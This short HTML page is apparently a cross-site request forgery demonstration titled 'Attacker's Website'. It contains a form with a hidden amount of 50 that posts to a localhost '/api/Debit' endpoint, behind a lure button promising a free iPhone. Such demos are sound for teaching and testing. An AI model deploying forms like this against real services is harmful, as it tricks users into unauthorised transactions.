<h3>Attacker's Website</h3>


<form method="post" action="http://localhost:2200/api/Debit">
  <input type="hidden" name="amount" value="50" />

  <button type="submit">Click here to win a free iPhone!</button>
</form>